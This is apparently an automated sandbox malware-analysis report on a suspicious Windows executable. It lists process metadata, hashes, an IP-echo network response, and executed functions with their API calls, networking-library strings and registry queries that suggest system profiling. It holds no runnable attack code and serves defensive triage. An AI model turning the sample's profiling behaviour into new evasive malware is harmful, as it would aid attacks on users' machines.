2024-12-20 15:13:06 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.189"}

Target ID:	0
Start time:	10:12:58
Start date:	20/12/2024
Path:	C:\Users\user\Desktop\u57m8aCdwb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\u57m8aCdwb.exe"
Imagebase:	0x500000
File size:	4'455'936 bytes
MD5 hash:	0E6E12F9A9C017B4BE17933AEACD543C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.3%
Total number of Nodes:	246
Total number of Limit Nodes:	37

Executed Functions

Function 0053F100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON

Download Yara Rule

Strings

%s assess started=%d, result=%d, xrefs: 00540150, 005401AE
Failed to connect to %s port %u after %lld ms: %s, xrefs: 00540254
%s starting (timeout=%lldms), xrefs: 0053FCDD, 0053FEB1
ipv6, xrefs: 0053F3DC
connect.c, xrefs: 0053F3BB, 0053F4FA
Connected to %s (%s) port %u, xrefs: 00540026
%s connect -> %d, connected=%d, xrefs: 0053F720
%s done, xrefs: 0053F9CD, 0053FD27, 0053FF03
%s trying next, xrefs: 0053F8FE
created %s (timeout %lldms), xrefs: 0053F4BE, 0053F5DF
Connection time-out, xrefs: 0053F2A3
%s connect timeout after %lldms, move on!, xrefs: 0053FA33
all eyeballers failed, xrefs: 005400FF
ipv4, xrefs: 0053F331, 0053F34B, 0053F36C, 0053F3EC, 0053F5BB
Connection timeout after %lld ms, xrefs: 005400AC

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID:
String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
API String ID: 0-1590685507
Opcode ID: ca6691ef59338e9e9389399867b01347acd0413b5b67c4be8ea4519cd744b57e
Instruction ID: 4a565be978c853f912168cf8c1b897fae315c137388dd6ae61a6e03e03858925
Opcode Fuzzy Hash: ca6691ef59338e9e9389399867b01347acd0413b5b67c4be8ea4519cd744b57e
Instruction Fuzzy Hash: E9C2C331A043459FD714CF28C485B6ABBE1BF84318F15CA6DED999B2A2D770ED84CB81

Function 0050255D Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 282
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNELBASE ref: 00502579
GlobalMemoryStatusEx.KERNELBASE ref: 005025CC
GetDriveTypeA.KERNELBASE ref: 00502647
GetDiskFreeSpaceExA.KERNELBASE ref: 0050267E
KiUserCallbackDispatcher.NTDLL ref: 005027E2
FindFirstFileW.KERNELBASE ref: 005028F8
FindNextFileW.KERNELBASE ref: 0050291F

Strings

;%P, xrefs: 005027FE
`, xrefs: 005029BC
@, xrefs: 005025B4

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
String ID: ;%P$@$`
API String ID: 3271271169-2703730284
Opcode ID: 7e19549b31c72c137f038d2aed39331c68d0bd60db9ca7703b1724f470b136bb
Instruction ID: 1faf33abe4e5644f48e4c57cbd606861731a05df0671fc04e08bef1ec241ffb6
Opcode Fuzzy Hash: 7e19549b31c72c137f038d2aed39331c68d0bd60db9ca7703b1724f470b136bb
Instruction Fuzzy Hash: 56D1CFB49147099FCB10EF68C99579EBBF0BF88314F41896DE89897340E7349A85CF92

Function 005029FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321
registryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNELBASE ref: 00502A27
RegOpenKeyExA.KERNELBASE ref: 00502A8A
CharUpperA.USER32 ref: 00502AEF
QueryFullProcessImageNameA.KERNELBASE ref: 00502C26
CloseHandle.KERNELBASE ref: 00502C49
CloseHandle.KERNELBASE ref: 00502DFC

Strings

0, xrefs: 00502DA9

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
String ID: 0
API String ID: 2406880114-4108050209
Opcode ID: a08b698e794b8409ed13119126d7f12bf861f92bf7d4440f65059a8f029f2fa1
Instruction ID: ae50c0f1bc73f1ca2c81fbdd6b2784778df65fe0b66f2b665b026585c56a32e6
Opcode Fuzzy Hash: a08b698e794b8409ed13119126d7f12bf861f92bf7d4440f65059a8f029f2fa1
Instruction Fuzzy Hash: A3E1C1B09156059FCB10EF68D989B9EBBF4AF84304F51886DE888DB350EB749985CF42

Function 005105B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAEventSelect.WS2_32(?,?,?), ref: 00510712
WSAEventSelect.WS2_32(?,?,00000000), ref: 005109DD
WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 005109FB

Strings

N=P, xrefs: 00510A65
multi.c, xrefs: 005107B2

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID: EventSelect$EnumEventsNetwork
String ID: N=P$multi.c
API String ID: 2170980988-3966857958
Opcode ID: 96bfdfdce23694d9e72ccf359c42d15920191e47fae821dcc1b7bbf29cbc2776
Instruction ID: b15bda227bdd758b60b51a38c7615b871138611918263f7f2c61749dad800a52
Opcode Fuzzy Hash: 96bfdfdce23694d9e72ccf359c42d15920191e47fae821dcc1b7bbf29cbc2776
Instruction Fuzzy Hash: 77D1BD756083069BF710DF24C895BABBBE9FF84344F04582CF88486292E7B4E9C5CB52

Function 00516FA0 Relevance: 6.3, APIs: 4, Instructions: 261
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 910fabde06f0e35ef876f05afb57d6bbe9299e42db7bd69247a96bcc8021e79e
Instruction ID: f976e911ee0d9ca113345f44777b3f6bd121946c0584090da9b94b566442390e
Opcode Fuzzy Hash: 910fabde06f0e35ef876f05afb57d6bbe9299e42db7bd69247a96bcc8021e79e
Instruction Fuzzy Hash: B491D43060D30D8BE7359A2C88947FB7AF5FBC8320F148A2CE8A9431D4E7759D81D691

Function 005CB180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getsockname.WS2_32(-00000020,-00000020,?), ref: 005CB2B6

Strings

cur != NULL, xrefs: 005CB3F2
ares__sortaddrinfo.c, xrefs: 005CB3ED

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID: getsockname
String ID: ares__sortaddrinfo.c$cur != NULL
API String ID: 3358416759-2430778319
Opcode ID: 412fd51bd38429294daeeca91a38b672eefb665fcc75378135bd48dfe96bf5a6
Instruction ID: 2ed50e5ef0817f32d868a3eb774e2ab4c5963f94bca87674975c03a44c49c2a3
Opcode Fuzzy Hash: 412fd51bd38429294daeeca91a38b672eefb665fcc75378135bd48dfe96bf5a6
Instruction Fuzzy Hash: 02C17F716043059FEB18DFA4C886F6A7BE5BF88304F04896CE8459B3A2E735ED45CB81

Function 005CA8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,005B712E,?,?,?,00001001,00000000), ref: 005CA90D

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID: recvfrom
String ID:
API String ID: 846543921-0
Opcode ID: b24fc14938cc82eea87cd8d04faf422fc67d8382a34d9d07b8455c11fd01822f
Instruction ID: f06ee38ac3051d29e6c939db2785eec5966dd965e6ce29fa61ec78f5f1f110c3
Opcode Fuzzy Hash: b24fc14938cc82eea87cd8d04faf422fc67d8382a34d9d07b8455c11fd01822f
Instruction Fuzzy Hash: D3F06D7510830CAFD2109E41DC89E6BBBEDFFCD758F05495DF948132118270AE10CAB2

Function 005BA440 Relevance: 53.6, APIs: 22, Strings: 8, Instructions: 1066registryCOMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 005BA499
GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 005BA4FB
GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 005BA531
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 005BAA19
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 005BAA4C
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 005BAA97
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 005BAAE9
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 005BAB30
RegCloseKey.KERNELBASE(?), ref: 005BAB6A
RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 005BAB82
RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 005BAC46
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 005BAD0A
RegEnumKeyExA.KERNELBASE ref: 005BAD8D
RegCloseKey.KERNELBASE(?), ref: 005BADD9
RegEnumKeyExA.KERNELBASE ref: 005BAE08
RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 005BAE2A
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 005BAE54
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 005BAF63
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 005BAFB2
RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 005BB072

Strings

DhcpDomain, xrefs: 005BB06C, 005BB0BB
Software\Policies\Microsoft\Windows NT\DNSClient, xrefs: 005BAB78
System\CurrentControlSet\Services\Tcpip\Parameters, xrefs: 005BAA0F
System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces, xrefs: 005BAD00
PrimaryDNSSuffix, xrefs: 005BAC6B, 005BACAE
SearchList, xrefs: 005BAA46, 005BAA91, 005BABA7, 005BABEA, 005BAE4E, 005BAE9D
Software\Policies\Microsoft\System\DNSClient, xrefs: 005BAC3C
Domain, xrefs: 005BAAE3, 005BAB2A, 005BAF5D, 005BAFAC

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID: QueryValue$Open$AdaptersAddresses$CloseEnum
String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
API String ID: 4281207131-1047472027
Opcode ID: a8db1eab6b3626d18ccb01500ef07019da3fc3852edac6cd1133b9bcf06d182a
Instruction ID: 619fd77a033328f915a02760797e083a5b28f17807b67e09ad9a5f32587d719c
Opcode Fuzzy Hash: a8db1eab6b3626d18ccb01500ef07019da3fc3852edac6cd1133b9bcf06d182a
Instruction Fuzzy Hash: EC728DB1604341AFE7209B24CC86FAB7BE8FF85700F144828F9859B291E775E945DB93

Function 0053A550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0053A832

Strings

bind failed with errno %d: %s, xrefs: 0053B080
@, xrefs: 0053AC42
Trying [%s]:%d..., xrefs: 0053A689
Name '%s' family %i resolved to '%s' family %i, xrefs: 0053ADAC
Bind to local port %d failed, trying next, xrefs: 0053AFE5
cf_socket_open() -> %d, fd=%d, xrefs: 0053A796
sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0053A6CE
@, xrefs: 0053A8F4
Couldn't bind to '%s' with errno %d: %s, xrefs: 0053AE1F
Trying %s:%d..., xrefs: 0053A7C2, 0053A7DE
Local port: %hu, xrefs: 0053AF28
Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0053AD0A
cf-socket.c, xrefs: 0053A5CD, 0053A735
Could not set TCP_NODELAY: %s, xrefs: 0053A871
Local Interface %s is ip %s using address family %i, xrefs: 0053AE60

Memory Dump Source

Source File: 00000000.00000002.2642863152.0000000000501000.00000040.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.2642841065.0000000000500000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642863152.0000000000C27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643417774.0000000000C2A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000C2C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000DBC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000EC8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643442476.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643773932.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643918856.000000000116F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643937713.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_500000_u57m8aCdwb.jbxd

Similarity

API ID: setsockopt
String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
API String ID: 3981526788-2373386790
Opcode ID: 65d8a019ca053a2c1b5a4080911f95a0a630ceacec652221c5f90b0eda5e62d5
Instruction ID: 6da106c4f15541a705b3b6666d622d834277e8f60f570d8b1199cf2d80697b4f
Opcode Fuzzy Hash: 65d8a019ca053a2c1b5a4080911f95a0a630ceacec652221c5f90b0eda5e62d5
Instruction Fuzzy Hash: 3062E371508341ABE721CF24C886FABBBE4FF95314F044929F98997292E771E845CB93

Function 005C9740 Relevance: 16.5, APIs: 3, Strings: 6, Instructions: 743
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 005C9946
